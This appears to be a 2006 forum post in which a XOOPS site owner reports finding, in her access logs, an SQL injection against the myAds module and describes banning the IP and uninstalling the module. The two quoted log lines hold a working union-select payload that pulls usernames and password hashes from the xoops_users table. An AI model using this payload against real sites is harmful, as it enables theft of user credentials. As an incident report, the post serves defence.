20
Thanks to protector, that I didn't think was very useful... I found a suspicious IP. I then grepped through my log file and voila:
81.215.110.79 - - [22/Aug/2006:12:52:17 -0400] "GET /showez/modules/myAd s/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7 ,8,9,10,11,12,13+from+xoops_users+limit+1/* HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
81.215.110.79 - - [22/Aug/2006:12:52:17 -0400] "GET /showez/themes/neoblue/style/style.css HTTP/1.1" 404 - "http://www.horseshowsrus.ca/showez/m odules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid, uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1/*" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
(I figured out where the ip bans were and got back into my XOOPS admin!)
I banned this IP. I have uninstalled myads.
This is a good lesson in sql injection!!!!
Thanks everyone for the help.
Deb
*/